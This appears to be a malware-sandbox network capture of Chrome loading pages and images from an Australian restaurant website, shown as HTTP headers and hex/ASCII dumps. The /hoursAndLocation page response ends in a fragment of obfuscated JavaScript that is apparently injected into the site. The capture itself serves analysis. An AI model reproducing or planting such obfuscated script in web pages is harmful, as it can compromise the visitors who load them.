                                                                                                                                                    last-modified: Thu, 05 Oct 2023 21:14:44 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 165434
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:57 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:57 UTC16030INData Raw: ff d8 ff e1 1f 50 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 0f a0 00 00 01 01 00 03 00 00 00 01 17 70 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 24 00 00 05 38 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: PExifMM*p(1"2*i@%$8CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:57 UTC5499INData Raw: b9 25 c7 66 dd 07 d0 fe 69 d5 37 e9 7b 76 7a 0b 70 75 fe 88 7a 79 65 d6 1b 6c 68 27 6b 80 73 c6 93 ed d1 db 52 33 cd 19 6e 4e 96 af 6f 17 09 22 b7 ad de 48 b8 35 ee 63 da 6b b3 89 6c f0 7f 3b b6 ed c8 be f8 fe 70 fd 18 e5 dc 4f d3 fa 5f f4 54 fa bf 57 e8 b6 19 ae ab 08 69 04 13 a4 fe f3 78 6a cc fd bb 87 ff 00 71 04 71 1a 7d 1f dc ff 00 bf fa aa c8 e3 30 32 e0 f5 0f c5 af 71 be 1e 2d 0b ff d7 d2 af eb 1f d5 e0 f1 bb d4 db 00 3b 52 0c c6 ae f6 ed dd ee 42 b7 eb 5f d5 8a ac 2e 18 f7 5a 41 96 8d c4 03 fd 7d c1 cb cc 32 33 ef 69 df 8d 92 e3 59 3c 3e b6 b1 c0 f7 9d 9e ab 3f e9 a0 7d b3 3a e7 01 f6 97 17 1d 00 1b a4 fc 36 35 50 8f 28 2a f4 fb 3f ee 78 5b 67 36 bd 7e df fd 09 f5 3b ff 00 c6 1f 4f 27 d4 a7 a4 36 c7 81 0d 36 16 98 1f 2a 9a b3 6f fa ff 00 95 63 83
                                                                                                                                                    Data Ascii: %fi7{vzpuzyelh'ksR3nNo"H5ckl;pO_TWixjqq}02q-;RB_.ZA}23iY<>?}:65P(*?x[g6~;O'66*oc
                                                                                                                                                    2024-10-01 04:26:57 UTC16384INData Raw: 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20 56 69 65 77 69 6e 67 20 43 6f 6e 64 69 74 69 6f 6e 20 69 6e 20 49 45 43 36
                                                                                                                                                    Data Ascii: IEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC6
                                                                                                                                                    2024-10-01 04:26:57 UTC16384INData Raw: 9a cb 58 b4 b0 31 ef c2 e1 fb 78 1b b4 54 21 e6 dd 64 87 8b 75 86 85 f9 12 7a 7e 71 b9 56 d3 57 92 4c 95 3e e3 cf b9 fa 27 c3 9b 35 d6 43 82 2a a9 0d dd cb d3 b8 93 14 d6 16 c6 3b 2f 1a b5 ed c2 37 4e 7e 93 d7 e7 50 65 78 6c 75 86 b4 a4 5b b2 6d 70 45 f5 e5 2b bf 97 e8 2f 67 c2 e8 00 00 00 00 00 00 00 00 08 9a 61 38 8a a2 43 89 35 0e 6a 0a b8 b9 d4 79 a8 f9 e9 1e 6a 34 69 44 ab cf ec a1 c7 d3 39 3b 2f 75 c7 e8 7f 6f e4 d6 b6 af dd 60 38 fd 0d fe 7c ef 13 e4 9c fe b7 aa 3f 3e 92 08 57 d1 bd ed f2 73 dc db d4 73 df 13 5d 2a 29 d2 be 9f 9f e1 f4 f5 59 7d 35 76 d4 97 9a 1e 68 ac db ac 94 73 df af 33 43 db f3 68 ce 74 e9 c9 d6 35 3a 61 8c e7 d3 03 c3 df 61 95 37 44 26 ed dc 29 11 e6 e4 b7 2e a6 2e 76 e0 5c 65 56 dc fa e9 fa 79 66 ed 1a 7d f9 f3 b8 69 84 e7 d5
                                                                                                                                                    Data Ascii: X1xT!duz~qVWL>'5C*;/7N~Pexlu[mpE+/ga8C5jyj4iD9;/uo`8|?>Wss]*)Y}5vhs3Cht5:aa7D&)..v\eVyf}i
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 44 14 d6 a0 02 c0 58 e8 4a 25 00 82 ca 25 39 41 8c a0 b3 d0 00 9c d0 81 52 22 50 fb 23 f6 67 d8 27 fd dc 13 9a 85 72 51 ae 50 84 e4 40 53 ab 95 35 5f 20 c8 fd 6e 20 2f 50 42 30 10 62 0c 2b c5 06 92 9a 14 6d 08 91 87 bc 01 31 1d 09 44 a6 14 f6 14 62 39 64 24 26 b1 08 d7 ad 78 84 d6 26 30 a6 b4 94 1a 42 61 ee e7 84 09 41 99 5f 8e 17 a0 23 18 41 a0 20 50 70 45 e0 2f 34 09 29 8d ca 6d 72 53 a9 a7 46 47 42 89 58 45 77 41 0c ac a3 d0 14 0a 05 65 12 13 8a 81 df bb 2b c9 12 33 94 1c 8b 97 b3 b8 1e 40 82 9a 0e 03 32 8b 0e 22 ae f2 3f 16 4c b6 ab dc 4d 37 92 da 6e 09 91 10 8b 53 aa 82 45 76 05 e9 62 10 30 2b 70 b5 a2 53 18 26 56 04 6c 35 36 6c a0 53 b2 99 94 19 84 c6 95 e2 a4 18 0e 88 92 58 51 87 2a 38 48 5e b0 8c 48 40 33 eb ee d8 d7 ad 08 d7 a8 26 c4 99 12 6c 60
                                                                                                                                                    Data Ascii: DXJ%%9AR"P#g'rQP@S5_ n /PB0b+m1Db9d$&x&0BaA_#A PpE/4)mrSFGBXEwAe+3@2"?LM7nSEvb0+pS&Vl56lSXQ*8H^H@3&l`
                                                                                                                                                    2024-10-01 04:26:58 UTC16331INData Raw: c0 30 e8 4f 8d a6 06 a0 32 75 ec 7f b6 5f fb 3e 8c 2f b7 e8 67 f9 c8 04 a7 17 34 97 9c b7 2e 74 20 02 d6 b7 32 b5 be 45 ad 09 8f 63 90 6f 92 00 83 e4 1c db 31 07 07 43 83 4f c7 ca 46 0f 63 87 6e 99 59 59 ff 00 e0 35 62 2f 7c b5 1a d1 23 0b 1d 5f c4 3e 26 0f 2f 53 b1 3b 1c 07 bb c4 40 03 dc c8 f0 d9 88 68 89 c4 a2 d0 54 ac c8 a6 71 2c 8f ff 00 91 c7 3f fc 1a bc a5 8f f7 31 c1 f1 36 57 fa 46 60 90 87 47 e0 45 86 37 0f 87 f7 d5 67 81 0d 1e 36 a3 ed 1b 70 9c 48 0f 77 68 e5 0d 96 4f fb 3a 04 7b 7f f0 48 5c 84 c1 ae f6 37 21 c1 ae 8a d0 08 ce 5c 81 fd a3 01 47 38 f1 96 46 14 df be 32 26 01 a2 36 bc cd 2f fd 9f fc 1e 00 dc 39 be 4e 21 c8 11 86 82 4b 07 ec 7c 80 06 cd 95 ee fd cd 6f 90 90 16 91 67 0e 92 67 b9 d0 0c be 4e 1b b1 f6 7f e3 f6 39 ff 00 c6 6c 55 8e 27
                                                                                                                                                    Data Ascii: 0O2u_>/g4.t 2Eco1COFcnYY5b/|#_>&/S;@hTq,?16WF`GE7g6pHwhO:{H\7!\G8F2&6/9N!K|oggN9lU'
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: eb 5c 77 e4 2b 4f d0 e9 b7 74 e1 a3 a9 d7 36 3e 37 7e 97 19 da 4d c9 4e 96 7d 0f 20 d6 ef 23 bf cb 23 be b6 fa b9 35 bc 4f 59 bd 64 15 75 5b 4d 1e ae 9b 39 1f 1f d6 bb 51 f2 2c 56 ee 69 60 e4 fb ab dc 92 bd ba 9b 9d 3e c6 d0 d7 d1 b9 60 52 fc 89 8b a9 cb 58 8a 54 b5 73 33 9b 71 ea b3 6b a1 e3 94 23 8d 9a aa cd 8b e3 ed 55 78 79 56 3b 86 82 be 5b b0 2c f3 fe 39 cd 99 4f e2 a7 79 06 3c 10 0b 95 2a 33 dd 75 5e 0f cc a5 5c 73 80 73 01 25 2f 8f 77 f4 9b 07 1d b6 54 54 a4 64 2f 86 48 60 85 92 96 30 90 b9 4c 6e 7e d6 8e a6 b5 47 b1 af f3 2f 74 6e b3 66 49 8b ef 41 2c ff 00 23 b0 bf e3 e6 47 23 47 1d d4 58 d8 f1 6b 1f 1e 5f 24 fc 5d bd 75 8d 97 18 d8 d1 91 bc 12 e1 d1 d1 e2 75 9f 0f 0e fc 38 f5 96 29 6c a4 d0 b0 d8 d7 b7 8e 6f f6 da d8 77 50 5d 65 9f f2 7b 3b 0d
                                                                                                                                                    Data Ascii: \w+Ot6>7~MN} ##5OYdu[M9Q,Vi`>`RXTs3qk#UxyV;[,9Oy<*3u^\ss%/wTTd/H`0Ln~G/tnfIA,#G#GXk_$]uu8)lowP]e{;
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 84 f9 78 8e bb 6e 9f 89 33 a2 f5 76 5e 11 cb 40 74 8d 12 1f 60 44 ab a8 2a 4a ba 92 a0 ab ab a9 cc 26 19 05 19 27 25 5d 5c 52 29 34 94 e6 ca c5 5b 64 d6 11 cb 1c b1 38 f2 a1 18 9f e2 46 07 b5 7b ab c7 97 e9 40 63 d6 36 af 57 d7 0a 21 5d 59 42 90 54 3c 79 90 7e b4 de ea 71 d7 b8 c3 45 ca 92 55 f6 ee 9c 14 f4 08 a2 81 45 d0 21 62 4a 6d 83 50 07 6a cc 8f fe 10 3f 95 63 97 c4 34 63 97 06 ea 11 1d 5f f6 a0 2e 83 76 a0 56 43 e2 03 24 3b b2 52 9b 8f 23 b1 37 72 0e af da 9b e3 7e 7a 03 68 cb 1c 90 5e b5 0a 75 9f 45 70 c4 75 e7 8a 38 3c 7d 4c 90 1f 0a 90 d5 27 b3 60 52 34 f2 e2 bf dd 24 f8 7e 2e 4f 12 f0 b7 fa 9f 9b 2c b3 5e 3c bc 5f 95 7f b1 9e 5c cf e5 38 9f 2a 07 13 ce 3d ef ca 89 62 cb c2 1d 4a 64 19 73 7e 54 42 6e 80 2b d4 bf 36 39 f2 d3 f8 54 50 14 42 6a de
                                                                                                                                                    Data Ascii: xn3v^@t`D*J&'%]\R)4[d8F{@c6W!]YBT<y~qEUE!bJmPj?c4c_.vVC$;R#7r~zh^uEpu8<}L'`R4$~.O,^<_\8*=bJds~TBn+69TPBj
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 7b 68 5e 42 7b 68 a8 17 6e 66 b0 5c ab c3 1d f1 ef ad d8 64 20 fa 67 b0 d4 a8 70 01 b2 3d 86 ae 0e 7c 3d 80 d0 be 26 86 34 45 6a 47 b1 18 f1 a0 d2 59 8f ca 4d 1b a0 07 be d4 18 29 07 90 3c 28 3a 06 04 70 bd e8 48 41 04 65 61 40 34 67 01 86 1c aa e6 23 dd 58 ae 9f f6 56 36 ef a8 da d9 83 73 ed d0 4f ff 00 cc 2a 8e c3 12 b7 d6 be de a7 d4 fa 50 f5 3a 26 e7 79 29 dc c4 ca 19 b6 bb a9 5c b3 68 63 7f bb 9a fa 87 d9 6f 0d 7a e7 54 3b a6 40 a9 ba 8c 7a 96 07 cc 74 13 74 6b f9 b4 d7 fd 06 c7 6f ba f4 af 14 30 48 03 ab 33 9f 16 e3 70 1b c6 7e d5 bc d4 22 75 6d 99 db c6 64 df f5 45 ba 25 d8 12 15 23 6f 0e 07 c4 6d f2 f8 3c ed 50 f5 24 ea 51 da 08 b7 1b dd b6 db 75 14 92 1f 4e 15 b1 67 85 6f 66 75 3e 05 f2 eb fb b6 a8 b6 db be 9d d3 d5 e5 10 c1 d6 7a c3 96 33 2f e2
                                                                                                                                                    Data Ascii: {h^B{hnf\d gp=|=&4EjGYM)<(:pHAea@4g#XV6sO*P:&y)\hcozT;@zttko0H3p~"umdE%#om<P$QuNgofu>z3/
                                                                                                                                                    2024-10-01 04:26:58 UTC16384INData Raw: 75 1e 9f 22 c4 3c bb 88 fe f2 32 39 ea 5f d7 ec e9 a9 ce 75 fa 2a 25 c3 05 17 ab ae 76 a5 5e dc 2a 4f c3 ee 24 fc 02 13 e9 2c 61 95 58 5f 32 08 bd 04 97 6c e5 b8 3e 39 fb e8 24 f1 0b e1 6c 85 37 e1 62 2c 0f 0a fb ed a3 11 c1 4a b1 1f 55 13 b5 e9 8d c9 6c af 6c 7b 85 19 1f 68 e0 5f 10 11 c5 be 8a 11 be c7 73 73 99 48 9c 8f aa 9f 77 2f 4e dd 4c 63 c0 44 61 7b 93 ce d6 af c3 ed 7f 2b 6f c2 7c a7 d1 93 f6 51 dd 3f e5 fd da eb 16 2a 60 93 f5 8a d5 b8 e9 93 c4 57 1b 34 12 01 dc 70 a2 b1 42 9b 74 5c cb 23 63 f1 ad 52 a4 72 30 c8 a6 07 e1 42 26 0d 12 01 98 b9 f8 53 24 b2 cd a1 8d 8e 96 22 c0 fe b1 50 6e 77 1f 84 12 3a 29 87 a7 74 ad 09 3b 40 97 1f 8b f3 06 63 ea f8 65 f9 d3 46 ba 8f 61 b9 49 db 6d b7 85 f7 ad b7 9f 78 b2 24 51 9b af ae 20 3a 9d 56 57 0e b2 34 6f
                                                                                                                                                    Data Ascii: u"<29_u*%v^*O$,aX_2l>9$l7b,JUll{h_ssHw/NLcDa{+o|Q?*`W4pBt\#cRr0B&S$"Pnw:)t;@ceFaImx$Q :VW4o


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    138192.168.2.449904162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:57 UTC390OUTGET /assets/imgs/food_menu_beverage.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:57 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:57 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 20129
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:57 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:57 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 30 08 06 00 00 00 b5 de e2 fe 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR70pHYsttfx?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:57 UTC4097INData Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22
                                                                                                                                                    Data Ascii: <?xpacket end="w"


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    139192.168.2.449907162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:57 UTC671OUTGET /hoursAndLocation HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:58 UTC246INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    content-length: 17802
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:58 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:58 UTC16138INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 61 67 72 61 50 72 6f 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 66 67 68 61 6e 20 48 61 79 61 74 20 52 65 73 74 61 75 72 61 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="author" content="AdagraPro"> <title>Afghan Hayat Restaurant</title> <
                                                                                                                                                    2024-10-01 04:26:58 UTC1664INData Raw: 78 35 61 61 30 66 64 2b 5f 30 78 33 36 35 62 5b 30 78 31 31 5d 2c 5f 30 78 35 39 34 62 32 33 29 2c 5f 30 78 33 38 31 61 31 38 3d 28 5f 30 78 33 61 62 30 36 66 2c 5f 30 78 32 38 38 38 37 33 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 32 36 36 38 38 39 3d 30 78 33 65 38 2a 30 78 33 63 2a 30 78 33 63 3b 72 65 74 75 72 6e 20 4d 61 74 68 5b 5f 30 78 33 36 35 62 5b 30 78 31 61 5d 5d 28 4d 61 74 68 5b 5f 30 78 33 36 35 62 5b 30 78 31 39 5d 5d 28 5f 30 78 32 38 38 38 37 33 2d 5f 30 78 33 61 62 30 36 66 29 2f 5f 30 78 32 36 36 38 38 39 29 3b 7d 2c 5f 30 78 33 66 31 33 30 38 3d 28 5f 30 78 33 61 39 39 39 61 2c 5f 30 78 33 35 35 66 33 61 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 35 63 38 35 65 66 3d 30 78 33 65 38 2a 30 78 33 63 3b 72 65 74 75 72 6e 20 4d 61 74 68 5b 5f 30
                                                                                                                                                    Data Ascii: x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    140192.168.2.449909162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:58 UTC387OUTGET /assets/imgs/food_menu_extra.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:58 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:58 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:14 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 19306
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:58 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:58 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3c 00 00 00 33 08 06 00 00 00 cb aa 6b a7 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f f4 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR<3kpHYs?iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:58 UTC3274INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20
                                                                                                                                                    Data Ascii:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    141192.168.2.449910162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:58 UTC384OUTGET /assets/imgs/img_recipe_7.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:58 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:58 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Thu, 05 Oct 2023 21:19:30 GMT
